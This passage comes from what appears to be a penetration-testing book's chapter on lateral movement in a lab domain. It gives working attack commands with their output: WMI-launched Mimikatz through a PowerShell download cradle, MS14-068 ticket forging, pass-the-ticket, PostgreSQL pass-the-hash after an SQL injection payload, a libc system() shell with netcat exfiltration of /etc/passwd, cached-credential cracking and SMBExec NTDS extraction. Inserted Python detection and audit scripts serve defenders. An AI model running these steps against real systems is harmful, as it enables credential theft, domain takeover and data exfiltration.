A better option to move laterally is using WMI, or Windows Management Instrumentation. WMI is 
used to manage systems and is installed by default on all new Windows operating systems. We can 
take advantage of WMI to remotely execute commands on other systems to which we have access. 
Since we have compromised our victim and pulled hashes, we can now find an account with elevated 
privileges and run commands on remote hosts using those credentials. In the example below, we 
compromised a user “testuser1” that has access to another host. We can use WMI to execute Mimikatz 
remotely, write it out to a file in the Public folder, and read that file: 

• wmic /USER:"hacker\testuser1" /PASSWORD:"!Asdfasdfasdf1!" /NODE:172.16.151.201 process call create "powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSplc Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt" 

• dir \\win8\c$\Users\Public\ 

• type \\win8\c$\Users\Public\a.txt 

• del \\win8\c$\Users\Public\a.txt 

As you can see from the image below, we are currently on the host win7. We execute a wmic call to 
remotely execute a PowerShell script against the host win8 to run Mimikatz and dump it out to a file. 
Next, we will read that file from our win7 host. 


C:\Users\testuser1>hostname 
win7 

C:\Users\testuser1>wmic /USER:"hacker\testuser1" /PASSWORD:"!Asdfasdfasdf1!" /NODE:172.16.151.201 process call create "powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString('...Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt" 
Executing (Win32_Process)->Create() 
Method execution successful. 
Out Parameters: 
instance of __PARAMETERS 
{ 
        ProcessId = 1328; 
        ReturnValue = 0; 
}; 

C:\Users\testuser1>type \\win8\c$\Users\Public\a.txt 
[mimikatz 2.0 alpha (x64) banner, followed by the Invoke-Mimikatz -DumpCreds output] 


Remote PowerShell Execution with WMI 


This is done all remotely in memory without any executables being run. 
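Both the psexec_psh technique earlier and the wmic method here leave event-log artefacts even though nothing is written to disk: a service installed with a PowerShell encoded command (System event 7045) and powershell.exe spawned under WmiPrvSE.exe with a download cradle (Security event 4688). The following Python is an added example, not from the book or Metasploit, that tags constructed records of both kinds and decodes the -EncodedCommand payload; the field names, the service name and the URL are assumptions, and the encoded command is a harmless Write-Host.

```python
"""Flag remote PowerShell execution in Windows event data (constructed records)."""
import base64
import re
from typing import Dict, List, Optional

# -e / -enc / -EncodedCommand (any unambiguous prefix) followed by a base64 blob.
ENC_FLAG_RE = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b|Invoke-Expression", re.IGNORECASE)


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent or invalid."""
    for flag, blob in ENC_FLAG_RE.findall(command_line):
        if not "encodedcommand".startswith(flag.lower()):
            continue  # e.g. -exec or -ExecutionPolicy, not an encoded command
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def classify_event(event: Dict[str, str]) -> List[str]:
    """Tag one event with the indicators it carries (empty list = nothing notable)."""
    tags: List[str] = []
    if event.get("EventID") == "7045":
        cmd = event.get("ImagePath", "")
        if "powershell" in cmd.lower():
            tags.append("service-installed-with-powershell")  # psexec_psh-style service
    elif event.get("EventID") == "4688":
        cmd = event.get("CommandLine", "")
        parent = event.get("ParentProcessName", "").lower()
        if "powershell" in event.get("NewProcessName", "").lower() and parent.endswith("wmiprvse.exe"):
            tags.append("powershell-spawned-by-wmi")  # wmic process call create pattern
    else:
        return tags
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        tags.append("encoded-command")
    # Search the visible command line with the base64 blob blanked out (so random
    # base64 cannot produce a false match) and the decoded script for a cradle.
    visible = ENC_FLAG_RE.sub(" ", cmd)
    if CRADLE_RE.search(visible) or (decoded and CRADLE_RE.search(decoded)):
        tags.append("download-cradle")
    return tags


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return only the events carrying at least one indicator, with the decoded payload."""
    hits: List[Dict[str, object]] = []
    for ev in events:
        tags = classify_event(ev)
        if tags:
            cmd = ev.get("ImagePath") or ev.get("CommandLine", "")
            hits.append({"EventID": ev["EventID"], "tags": tags,
                         "decoded": decode_encoded_command(cmd)})
    return hits


# Constructed samples: a 7045 modelled on a psexec_psh service binary path, a 4688
# modelled on the wmic-launched cradle above, and two benign events.
SAMPLE_ENCODED = base64.b64encode("Write-Host 'hello'".encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    {"EventID": "7045", "ServiceName": "constructed-svc",
     "ImagePath": "%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e " + SAMPLE_ENCODED},
    {"EventID": "4688",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell.exe -exec bypass IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://example.invalid/script.ps1')"},
    {"EventID": "4688", "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe", "CommandLine": "notepad.exe"},
    {"EventID": "7045", "ServiceName": "Spooler",
     "ImagePath": r"C:\Windows\System32\spoolsv.exe"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```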

So is there a better way to do all this? Harmj0y created a MassMimikatz tool that, for the most part, 
does the same thing. {19} Let’s take a look at this. 


MassMimikatz will first start up a web server for the Mimikatz code. This is why we are going to set 
a FireWallRule in the switch statement. Next, the script will use WMI to execute PowerShell scripts 
on the hosts using the cached credentials on each system, and store the results in a folder called 
MimikatzOutput. Let’s see this in action against a few win7 and win8 systems. 

• Powershell.exe -NoP -NonI -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerToo MassMimikatz.ps1'); 'win7','win8' | Invoke-MassMimikatz -Verbose -FireWallRule" 


VERBOSE: Setting inbound firewall rule for port 8080 
VERBOSE: Sleeping, letting the web server stand up... 
VERBOSE: Executing command on host win7 
VERBOSE: Executing command on host win8 
VERBOSE: Waiting for commands to trigger... 
VERBOSE: Pulling output from folder 'MimikatzOutput' 

Server  Credential 
------  ---------- 
win7    testuser1/HACKER:[NTLM hash] 
win7    testuser1/HACKER:!Asdfasdfasdf1! 
win7    testuser1/HACKER.TESTLAB:!Asdfasdfasdf1! 
win8    lab/HACKER:[NTLM hash] 
win8    lab/HACKER:!Asdfasdfasdf1! 
win8    lab/HACKER.TESTLAB:!Asdfasdfasdf1! 
VERBOSE: Removing inbound firewall rule 
VERBOSE: Killing the web server 


MassMimikatz 


We don’t need to worry about password cracking at all, as we will use the speed and efficiency of 
MassMimikatz to pull clear text passwords. 


Kerberos - MS14-068: 


Kerberos had a lot of large vulnerabilities in the past couple of years. One of the biggest 
vulnerabilities was MS14-068. This gave any domain user the ability to escalate privileges to domain 
administrator. If you don’t have a great understanding of Kerberos yet, this would be a great time to 
get a refresher. If you do have a good understanding of Kerberos, keep moving forward. 


As we know, Kerberos is used for authentication and authorization. The underlying issue is that the 
Privilege Attribute Certificate (PAC), which stores information such as account name, ID, and group 
membership information, can be forged. This means that, with some basic information on a domain 
user, you have the ability to move to domain administrator. 

• git clone https://github.com/bidord/pykek /opt/pykek/ 

• apt-get install krb5-user 

• apt-get install rdate 

• rdate -n [Domain] 

• echo 172.16.151.200 dc.hacker.testlab >> /etc/hosts 

We are going to need to know four pieces of information: 

• -u username@domain [example: limiteduser@hacker.testlab] 

• -d domain controller [example: dc.hacker.testlab] 

• -p password 

• -s SID [example: S-1-5-21-3525058729-1821581466-2040179600-1111] 

We should have all the information except for the SID. To get the SID, just run this command on any 
limited user account: 

• whoami /user 


C:\Users\limiteduser>whoami /user 

USER INFORMATION 
---------------- 

User Name           SID 
=================== ============================================== 
hacker\limiteduser  S-1-5-21-3525058729-1821581466-2040179600-1111 


Retrieving SID information with Whoami 


Now that we have all the pieces we need: 

• cd /opt/pykek/ 

• python ms14-068.py -d dc.hacker.testlab -u limiteduser@hacker.testlab -s S-1-5-21-3525058729-1821581466-2040179600-1111 -p '!Asdfasdfasdf1!' 







root@kali:/opt/pykek# python ms14-068.py -d dc.hacker.testlab -u limiteduser@hacker.testlab -s S-1-5-21-3525058729-1821581466-2040179600-1111 -p '!Asdfasdfasdf1!' 
  [+] Building AS-REQ for dc.hacker.testlab... Done! 
  [+] Sending AS-REQ to dc.hacker.testlab... Done! 
  [+] Receiving AS-REP from dc.hacker.testlab... Done! 
  [+] Parsing AS-REP from dc.hacker.testlab... Done! 
  [+] Building TGS-REQ for dc.hacker.testlab... Done! 
  [+] Sending TGS-REQ to dc.hacker.testlab... Done! 
  [+] Receiving TGS-REP from dc.hacker.testlab... Done! 
  [+] Parsing TGS-REP from dc.hacker.testlab... Done! 
  [+] Creating ccache file 'TGT_limiteduser@hacker.testlab.ccache'... Done! 
root@kali:/opt/pykek# 


Creating the ccache Kerberos File 


We have a credential cache ticket generated, and to use it we copy it to /tmp/krb5cc_0: 

• cp TGT_limiteduser@hacker.testlab.ccache /tmp/krb5cc_0 

You can now access the host using: 

• smbclient -k -W hacker.testlab //dc.hacker.testlab/c$ -k 


The other option is to push the credential cache ticket and the mimikatz executable to the victim host 
and run: 

• mimikatz.exe "kerberos::ptc TGT_limiteduser@hacker.testlab.ccache" exit 


You are able to do a dir \\dc\c$ and have full access to the victim host. 


More info: 

• https://github.com/bidord/pykek 

• https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit 

• https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/ 


Pass-The-Ticket 


We should all be pretty familiar with Pass-the-Hash attacks from the previous book and this book as 
well. With all the Kerberos attacks, it is possible to pass Kerberos tickets as well. Let’s walk through 
an example of stealing Kerberos authentication tickets to impersonate users throughout the network. 
{20} 
C:\mimikatz_trunk\x64>dir \\dc\c$ 
Access is denied. 

C:\mimikatz_trunk\x64>mimikatz.exe 
[mimikatz 2.0 alpha (x64) release "Kiwi en C" banner] 

mimikatz # privilege::debug 
Privilege '20' OK 

mimikatz # sekurlsa::tickets /export 

Authentication Id : 0 ; 367551 
Session           : Interactive from 1 
User Name         : testuser1 
Domain            : HACKER 
SID               : S-1-5-21-3525058729-1821581466-2040179600-1106 


Kerberos Tickets 


• privilege::debug 

• sekurlsa::tickets /export 


The export command will write all of the Kerberos tickets to the folder from which it was executed. 
In the example below, we see the user account “lab” that we recovered. We know from the start that 
“lab” was a domain administrative account. 




[mimikatz 2.0 alpha x64 (oe.eo)] 

Group 0 - Ticket Granting Service 
 [00000000] 
   Service Name (02) : ldap ; dc.hacker.testlab ; @ HACKER.TESTLAB 
   Target Name  (02) : ldap ; dc.hacker.testlab ; @ HACKER.TESTLAB 
   Client Name  (01) : lab ; @ HACKER.TESTLAB 
   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
   Session Key       : 0x00000012 - aes256_hmac 
   * Saved to file [0;ab9bf]-0-0-40a50000-lab@ldap-dc.hacker.testlab.kirbi ! 
 [00000001] 
   Service Name (02) : LDAP ; DC.hacker.testlab ; hacker.testlab ; @ HACKER.TESTLAB 
   Client Name  (01) : lab ; @ HACKER.TESTLAB 
   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
   * Saved to file [0;ab9bf]-0-1-40a50000-lab@LDAP-DC.hacker.testlab.kirbi ! 
 [00000002] 
   Service Name (02) : HOST ; dc.hacker.testlab ; @ HACKER.TESTLAB 
   Client Name  (01) : lab ; @ HACKER.TESTLAB 
   Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; 
   * Saved to file [0;ab9bf]-0-2-40a50000-lab@HOST-dc.hacker.testlab.kirbi ! 


Kerberos Tickets 


If we look in the same folder, we see a Kerberos krbtgt ticket for the user account lab. We need to 
import that as one of our Kerberos tickets. Then, drop back into Mimikatz: 

• kerberos::ptt [0;ab9bf]-2-1-40e10000-lab@krbtgt-HACKER.TESTLAB.kirbi 






   * Saved to file [0;3e7]-2-1-40e10000-WIN7$@krbtgt-HACKER.TESTLAB.kirbi ! 

mimikatz # kerberos::ptt [0;ab9bf]-2-1-40e10000-lab@krbtgt-HACKER.TESTLAB.kirbi 
* File: '[0;ab9bf]-2-1-40e10000-lab@krbtgt-HACKER.TESTLAB.kirbi': OK 

mimikatz # exit 
Bye! 

C:\mimikatz_trunk\x64>dir \\dc\c$ 
 Volume in drive \\dc\c$ has no label. 
 Volume Serial Number is 90F8-1BB9 

 Directory of \\dc\c$ 

 <DIR>          PerfLogs 
 <DIR>          Program Files 
 <DIR>          Program Files (x86) 
 <DIR>          Share 
 <DIR>          Users 
 <DIR>          Windows 
               0 File(s)              0 bytes 
               6 Dir(s) 

C:\mimikatz_trunk\x64> 


Exported ticket files in the working directory: 

[0;4b114]-0-1-40a50000-testuser1@ldap-dc.hacker.testlab.kirbi 
[0;4b114]-0-2-40a50000-testuser1@LDAP-DC.hacker.testlab.kirbi 
[0;4b114]-2-0-60a10000-testuser1@krbtgt-HACKER.TESTLAB.kirbi 
[0;4b114]-2-1-40e10000-testuser1@krbtgt-HACKER.TESTLAB.kirbi 
[0;ab9bf]-0-0-40a50000-lab@ldap-dc.hacker.testlab.kirbi 
[0;ab9bf]-0-1-40a50000-lab@LDAP-DC.hacker.testlab.kirbi 
[0;ab9bf]-0-2-40a50000-lab@HOST-DC.hacker.testlab.kirbi 
[0;ab9bf]-0-3-40a50000-lab@cifs-dc.hacker.testlab.kirbi 
[0;ab9bf]-2-0-60a10000-lab@krbtgt-HACKER.TESTLAB.kirbi 
[0;ab9bf]-2-1-40e10000-lab@krbtgt-HACKER.TESTLAB.kirbi 


Kerberos - Pass-the-Ticket 


Once we drop out of Mimikatz, we can do a directory listing on the domain controller and get a 
listing. We now have a Kerberos ticket as a domain administrative account. 
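The exported .kirbi names above encode the logon session (LUID), the ticket group, the ticket flags and client@service-realm. As an added example (not from the book or from Mimikatz), the following Python parses such a listing and decodes the flags the way sekurlsa::tickets prints them, so an incident responder who finds an attacker's exported tickets can tell at a glance which are TGTs for privileged accounts; the filename layout is taken from the listing on this page, the flag bits from RFC 4120, and the privileged-account list is an assumption.

```python
"""Triage a directory of Mimikatz-exported .kirbi tickets.

Filename layout, as seen in the listing above:
    [<luid>]-<group>-<index>-<flags>-<client>@<service>-<target>.kirbi
group 0 = Ticket Granting Service tickets, group 2 = Ticket Granting Tickets.
"""
import re
from typing import Dict, Iterable, List, Optional

# RFC 4120 TicketFlags, highest bit first (same names Mimikatz prints).
TICKET_FLAGS = {
    0x40000000: "forwardable", 0x20000000: "forwarded", 0x10000000: "proxiable",
    0x08000000: "proxy", 0x04000000: "may_postdate", 0x02000000: "postdated",
    0x01000000: "invalid", 0x00800000: "renewable", 0x00400000: "initial",
    0x00200000: "pre_authent", 0x00100000: "hw_authent",
    0x00080000: "transited_policy_checked", 0x00040000: "ok_as_delegate",
    0x00010000: "name_canonicalize",
}
GROUP_NAMES = {0: "Ticket Granting Service", 2: "Ticket Granting Ticket"}

KIRBI_RE = re.compile(
    r"^\[(?P<luid>[0-9a-f]+;[0-9a-f]+)\]-(?P<group>\d)-(?P<index>\d+)-"
    r"(?P<flags>[0-9a-f]{8})-(?P<client>[^@]+)@(?P<service>[^-]+)-(?P<target>.+)\.kirbi$",
    re.IGNORECASE,
)


def decode_flags(flags: int) -> List[str]:
    """Names of the set TicketFlags bits, highest bit first."""
    return [name for bit, name in TICKET_FLAGS.items() if flags & bit]


def parse_kirbi_name(name: str) -> Optional[Dict[str, object]]:
    """Split one exported-ticket filename into its fields; None if it is not one."""
    m = KIRBI_RE.match(name)
    if not m:
        return None
    flags = int(m.group("flags"), 16)
    group = int(m.group("group"))
    return {
        "name": name, "luid": m.group("luid"), "group": group,
        "group_name": GROUP_NAMES.get(group, f"group {group}"),
        "index": int(m.group("index")), "flags": flags, "flag_names": decode_flags(flags),
        "client": m.group("client"), "service": m.group("service"), "target": m.group("target"),
        "is_tgt": m.group("service").lower() == "krbtgt",  # a TGT lets its holder request any service ticket
    }


def triage_exported_tickets(names: Iterable[str],
                            privileged: Iterable[str]) -> List[Dict[str, object]]:
    """TGTs belonging to any of the given privileged accounts, in listing order."""
    priv = {p.lower() for p in privileged}
    hits: List[Dict[str, object]] = []
    for name in names:
        t = parse_kirbi_name(name)
        if t and t["is_tgt"] and str(t["client"]).lower() in priv:
            hits.append(t)
    return hits


# The ten filenames from the listing above; "lab" is the known domain admin.
EXPORTED_TICKETS = [
    "[0;4b114]-0-1-40a50000-testuser1@ldap-dc.hacker.testlab.kirbi",
    "[0;4b114]-0-2-40a50000-testuser1@LDAP-DC.hacker.testlab.kirbi",
    "[0;4b114]-2-0-60a10000-testuser1@krbtgt-HACKER.TESTLAB.kirbi",
    "[0;4b114]-2-1-40e10000-testuser1@krbtgt-HACKER.TESTLAB.kirbi",
    "[0;ab9bf]-0-0-40a50000-lab@ldap-dc.hacker.testlab.kirbi",
    "[0;ab9bf]-0-1-40a50000-lab@LDAP-DC.hacker.testlab.kirbi",
    "[0;ab9bf]-0-2-40a50000-lab@HOST-DC.hacker.testlab.kirbi",
    "[0;ab9bf]-0-3-40a50000-lab@cifs-dc.hacker.testlab.kirbi",
    "[0;ab9bf]-2-0-60a10000-lab@krbtgt-HACKER.TESTLAB.kirbi",
    "[0;ab9bf]-2-1-40e10000-lab@krbtgt-HACKER.TESTLAB.kirbi",
]

if __name__ == "__main__":
    for t in triage_exported_tickets(EXPORTED_TICKETS, {"lab"}):
        print(f"{t['client']}@{t['target']} TGT in session {t['luid']}: {', '.join(t['flag_names'])}")
```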


Lateral Movement With Postgres SQL 


I love lateral movement as it takes creativity and an understanding of how exactly technologies work. 
In versions of PostgreSQL v9.5 and earlier (remember that most orgs that I found do not regularly 
patch PostgreSQL), there is a vulnerability that allows pass-the-hash authentication. This was 
originally found by Jens Steube and Philipp Schmidt and allows an attacker to authenticate to 
PostgreSQL databases that utilize Challenge-Response Authentication using the AUTH_REQ_MD5 
method, or that simply configure "md5" as the Host Based Authentication (HBA) method in pg_hba.conf. {21} 


Here is their amazing paper on how they discovered that during the authentication process, the actual 
password is not checked; instead, the stored hash is what authenticates: 

https://hashcat.net/misc/postgres-pth/postgres-pth.pdf 

Let’s say you are on an internal penetration test, and you used SQLMap or a similar tool to identify an 
SQL injection on a web page that utilizes a PostgreSQL backend. It might look something like: 

• http://postgres.suck.testlab/search.php?search=weapons' union select null,concat(usename,passwd) FROM pg_shadow-- 

• http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet 


The result will be a list of hashes of all the users: 

• postgres,md532e12f215ba27cb750c9e093ce4b5127 

• Secretlogin,md598d21549d6420160b54f7898a7ff60cc 

• john,md5cbfaf1e32c711ee7ba63b5b65f8a777b 

• test,md505a671c66aefea124cc08b76ea6d30bb 

We could spend time dropping it into oclHashcat and trying to crack the passwords, but due to the PTH 
issue, we can actually connect to all the other PostgreSQL servers with just the hash. Let’s walk 
through how this is done. We are going to pull a copy of PostgreSQL onto our box, download the patch, 
apply the patch, and configure and install our modified version of psql. Psql is just an interactive 
terminal to connect to Postgres. With our modified version, we can now supply hashes instead of 
passwords. 

I tested this with Postgres commit a2e35b53c39b2a27d3e332dc7c506539c306fd44: 

• mkdir /opt/postgresql/ && wget https://github.com/postgres/postgres/archive/a2e35b53c39b2a27d3e332dc7c506539c: && unzip a2e35b53c39b2a27d3e332dc7c506539c306fd44.zip -d /opt/ && mv /opt/postgres-a2e35b53c39b2a27d3e332dc7c506539c306fd44 /opt/postgresql/ && cd /opt/postgresql/ 

• wget https://hashcat.net/misc/postgres-pth/postgresql_diff_clean.txt 

• git apply postgresql_diff_clean.txt 

• ./configure 

• make && make install 

• cd /usr/local/pgsql/bin/ 

• ./psql -h [IP of PostgreSQL server] -U postgres 

• Supply the hash of the postgres user 

But why stop there? To show you what you can do once you are logged in as the privileged Postgres 
user, we will read the /etc/passwd file. 

• CREATE TABLE mydata(t text); 

• COPY mydata FROM '/etc/passwd'; 

• SELECT t FROM mydata LIMIT 5 OFFSET 1; 



root@kali:/usr/local/pgsql/bin# ./psql -h 192.168.199.132 -U postgres 
Hash for user postgres: md532e12f215ba27cb750c9e093ce4b5127 
psql (9.5devel, server 9.1.13) 
Type "help" for help. 

postgres=# CREATE TABLE mydata(t text); 
CREATE TABLE 
postgres=# COPY mydata FROM '/etc/passwd'; 
COPY 44 
postgres=# SELECT t FROM mydata LIMIT 5 OFFSET 1; 
                    t 
---------------------------------------- 
 daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
 bin:x:2:2:bin:/bin:/bin/sh 
 sys:x:3:3:sys:/dev:/bin/sh 
 sync:x:4:65534:sync:/bin:/bin/sync 
 games:x:5:60:games:/usr/games:/bin/sh 
(5 rows) 

postgres=# 


Pass-the-Hash with PostgreSQL 


We can also run command shells to fully compromise the host. 

• CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; -- priv 

• SELECT system('cat /etc/passwd | nc 10.0.0.1 8080'); -- priv 

• http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet 

If you want to run this exercise in a controlled environment, the version installed on Kali Linux 
(before any updates) should be vulnerable as long as it is older than v9.5. If it is not, you will have to 
uninstall PostgreSQL before installing the vulnerable version. Once installed, create a new user (in 
this case “thp”), create a database, and print out the hash: 

• sudo -u postgres psql 

• create user thp createdb createuser password 'thp'; 

• create database thp owner thp; 

• select (usename,passwd) FROM pg_shadow; 

• Grab the created hash password for the “thp” user 

• Run the example above, but instead of the user “postgres” use “thp” 
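As an added example (not from the book or from the hashcat paper), the following Python shows why the md5 form is pass-the-hash-able and audits pg_hba.conf for it: the stored value is 'md5' + md5(password || username) and the client's AUTH_REQ_MD5 reply is 'md5' + md5(inner_hash || salt), so the reply can be computed from the stored hash alone; the mitigation is the scram-sha-256 method that PostgreSQL 10 introduced. The user, password, salt and pg_hba.conf contents are constructed.

```python
"""PostgreSQL md5 authentication: hash equivalence and pg_hba.conf audit."""
import hashlib
from typing import Dict, List


def pg_stored_md5(password: str, username: str) -> str:
    """Value PostgreSQL stores in pg_shadow.passwd for an md5 password."""
    return "md5" + hashlib.md5((password + username).encode("utf-8")).hexdigest()


def md5_auth_response_from_hash(stored_hash: str, salt: bytes) -> str:
    """Client reply to AUTH_REQ_MD5, computed from the stored hash alone.

    The server compares this against the same computation over pg_shadow, so
    whoever holds the stored hash can answer the challenge without the password.
    """
    if not (stored_hash.startswith("md5") and len(stored_hash) == 35) or len(salt) != 4:
        raise ValueError("expected 'md5' + 32 hex chars and a 4-byte salt")
    return "md5" + hashlib.md5(stored_hash[3:].encode("ascii") + salt).hexdigest()


def md5_auth_response_from_password(password: str, username: str, salt: bytes) -> str:
    """The same reply, computed the way a legitimate client does (from the password)."""
    return md5_auth_response_from_hash(pg_stored_md5(password, username), salt)


WEAK_METHODS = {
    "md5": "stored hash is password-equivalent (pass-the-hash); use scram-sha-256",
    "password": "password sent in clear text; use scram-sha-256 over TLS",
    "trust": "no authentication at all",
}


def audit_pg_hba(conf: str) -> List[Dict[str, object]]:
    """Flag pg_hba.conf entries that use a weak auth method.

    Handles the usual single-address form (TYPE DATABASE USER ADDRESS METHOD);
    the legacy two-field 'ADDRESS MASK' form is not parsed (assumption).
    """
    findings: List[Dict[str, object]] = []
    for lineno, raw in enumerate(conf.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        method_idx = 3 if fields[0] == "local" else 4
        if len(fields) <= method_idx:
            continue
        method = fields[method_idx].lower()
        if method in WEAK_METHODS:
            findings.append({"line": lineno, "entry": line, "method": method,
                             "reason": WEAK_METHODS[method]})
    return findings


# Constructed pg_hba.conf: the two md5 entries are what the attack above needs.
SAMPLE_PG_HBA = """\
# TYPE  DATABASE  USER  ADDRESS         METHOD
local   all       all                   peer
host    all       all   127.0.0.1/32    md5
host    all       all   10.0.0.0/8      md5
hostssl all       all   10.0.0.0/8      scram-sha-256
"""

if __name__ == "__main__":
    salt = b"\x8a\x1f\x3c\x02"  # constructed; the server picks 4 random bytes per connection
    stored = pg_stored_md5("thp", "thp")
    print("stored:", stored)
    print("reply from password:", md5_auth_response_from_password("thp", "thp", salt))
    print("reply from hash:    ", md5_auth_response_from_hash(stored, salt))
    for f in audit_pg_hba(SAMPLE_PG_HBA):
        print(f"line {f['line']}: {f['entry']}  ->  {f['reason']}")
```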


Pulling Cached Credentials 


Did you ever try to log onto your laptop while you weren’t on the network? How can you authenticate 
without being connected to the domain? It is because Windows stores the last ten users with 
successful logins by default. If we can dump this, this is another way to find additional credentials. 
We won’t be able to pull these passwords in clear text, so we will have to try to crack these 
credentials. 


What types of users might you see? Of course the user of the laptop, but you will usually also find an 
account like “helpdesk” or similar, as they originally set up the machine. In the next example, we will 
assume you already have a Meterpreter shell on our victim host and we will use Metasploit’s 
cachedump module to pull these creds. 


Within Metasploit, we can use cachedump (with Local Admin privileges): 

• use post/windows/gather/cachedump 

• set SESSION 1 

• show options 

• exploit 

[*] Executing module against win7 
[*] Cached Credentials Setting: - (Max is 50 and 0 disables, and 10 is default) 
[*] Obtaining boot key... 
[*] Obtaining Lsa key... 
[*] Vista or above system 
[*] Obtaining LK$KM... 
[*] Dumping cached credentials... 
[*] Hash are in MSCACHE_VISTA format. (mscash2) 
[*] MSCACHE v2 saved in: /root/.msf4/loot/20150128134030_default_192.168.199.1_mscache2.creds_209900.txt 
[*] John the Ripper format: 
# mscash2 

domainadmin: $hacker$#domain_admin#06198c06198c06198c06198c06198c9 :HACKER.TESTLAI 


To crack in oclHashcat: 

If it is in a file, the proper format is: 

$DCC2$10240#account_name#hash 

Although using faster GPUs helps, the major problem with cached credentials is that they are very, very 
slow to crack. Attacking cached credentials is usually an approach that you might take if you can’t 
move laterally or need to crack in the background while you continue to attack. Let’s look at the 
oclHashcat command: 

• oclHashcat64.exe -m2100 hashes\mscash2.txt lists\crackstat_realhuman_phill.txt 



Session.Name...: oclHashcat 
Status.........: Running 
Rules.Type.....: File (rules\InsidePro-HashManager.rule) 
Input.Mode.....: File (lists\crackstat_realhuman_phill.txt) 
Hash.Target....: $DCC2$10240#test1#[hash] 
Hash.Type......: DCC2, mscash2 
Time.Started...: Thu Jan 29 21:04:21 2015 (1 sec) 
Time.Estimated.: Tue Feb 17 05:18:41 2015 (18 days, 8 hours) 
Speed.GPU.#1...: 135.1 kH/s 
Speed.GPU.#2...: 140.9 kH/s 
Speed.GPU.#*...: 276.0 kH/s 
Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts 
Progress.......: 405504/410478832235 (0.00%) 
Skipped........: 0/405504 (0.00%) 
Rejected.......: 0/405504 (0.00%) 
HWMon.GPU.#1...: 99% Util, 45c Temp, N/A Fan 
HWMon.GPU.#2...: 100% Util, 49c Temp, N/A Fan 

Session.Name...: oclHashcat 
Status.........: Aborted 
Hash.Type......: DCC2, mscash2 
Time.Started...: Thu Jan 29 21:04:21 2015 (3 secs) 
Time.Estimated.: Thu Feb 19 08:32:47 2015 (20 days, 11 hours) 
Speed.GPU.#1...: 135.0 kH/s 
Speed.GPU.#2...: 140.9 kH/s 
Speed.GPU.#*...: 275.9 kH/s 
Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts 
Progress.......: 698368/410478832235 (0.00%) 

Started: Thu Jan 29 21:04:21 2015 
Stopped: Thu Jan 29 21:04:25 2015 


oclHashcat - mscash2 


We can decide to add a rule to cracking our mscash2 hash with the command: 

• oclHashcat64.exe -m2100 hashes\mscash2.txt lists\crackstat_realhuman_phill.txt -r rules\InsidePro-HashManager.rule --force 


We are now looking at about 20 days to crack this hash. Although mscash2 hashes are extremely 
valuable, the amount of time it takes to crack might not be feasible on a one-week penetration test. 
This could be used for more long-term attacks. 


Attacking The Domain Controller: 


If you were lucky enough to get a local administrative account or a domain admin account, the next 
target is usually the Domain Controller (DC). One of the happiest moments for any pentester is when 
they successfully pull all the hashes out of the DC. 


Even with administrative credentials, we don't have access to read the hashes on the Domain 
Controller that are stored in the c:\Windows\NTDS\ntds.dit file. This is because the file is locked 
for reading while Active Directory constantly accesses it. The solution to this problem is to use the 
Volume Shadow Copy functionality native to Windows to create a copy of that file. {22} 


SMBExec 

(https://github.com/brav0hax/smbexec) (Kali Linux) 


This is where a tool called SMBExec comes into play. SMBExec, a tool made by brav0hax, grabs the 
SYSTEM registry hive and the ntds.dit file using the Shadow Copy functionality. Let's take a look at 
the SMBExec module that we installed in the Setting Up Your Box section. 

• Running SMBExec 

o cd /opt/smbexec 
o ./smbexec 

• Select 3 for Obtain Hashes 

• Select 2 for Domain Controllers 

• Provide username/hash/domain/IP/NTDS Drive/NTDS Path 


Please provide the username to authenticate as: adminaccount
Please provide the password or hash (<LM>:<NTLM>) [BLANK]: !Admin!Account!
Please provide the Domain for the user account specified (localhost): corp.fakedomain.testlab
Domain Controller IP address: 172.16.139.1%
Enter NTDS Drive [C:]:
Enter NTDS Path [\Windows\NTDS]:
[*] Checking to see if the ntds.dit file exists in the provided path
[+] The ntds.dit file was found in the path provided...
Enter the Drive to save the Shadow Copy and SYS key [C:]:
Enter the Path to save the Shadow Copy and SYS key [\Windows\TEMP]:
[*] Checking to see if the provided path exists
[+] The path provided exists...
[*] We have to make sure there is enough disk space available before we do the Shadow Copy
[+] Plenty of diskspace...
[*] Attempting to create a Volume Shadow Copy for the Domain Controller specified...
